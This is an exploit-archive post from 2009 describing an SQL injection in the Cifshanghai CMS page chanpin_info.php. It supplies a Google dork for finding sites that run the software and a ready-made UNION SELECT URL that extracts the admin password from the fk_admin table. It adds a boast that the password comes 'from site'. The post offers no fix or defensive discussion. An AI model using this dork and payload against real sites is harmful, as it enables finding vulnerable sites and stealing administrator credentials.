[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Cifshanghai (chanpin_info.php) CMS SQL Injection
# Published : 2009-11-16
# Author : ProF.Code
# Previous Title : Telepark Wiki v2.4.23 Multiple Remote Vulnerabilities
# Next Title : Arbitrary File Download in phpMyBackupPro
=====================================
| cifshanghai.com script The news (chanpin_info.php) by pass
=====================================
Author: ProF.Code
Email : adt@hotmail.com
~~~~~~~~~~~~~~~~~~~~
dork(google) : "Powered by cifshanghai.com"
~~~~~~~~~~~~~~~~~~~~
demo: http://server/chanpin_info.php?showlei=&Leiid=&n=1&id=-177+union+select+1,password,3,4,5,6,7,8+from+fk_admin
user : admin
pass : From site :D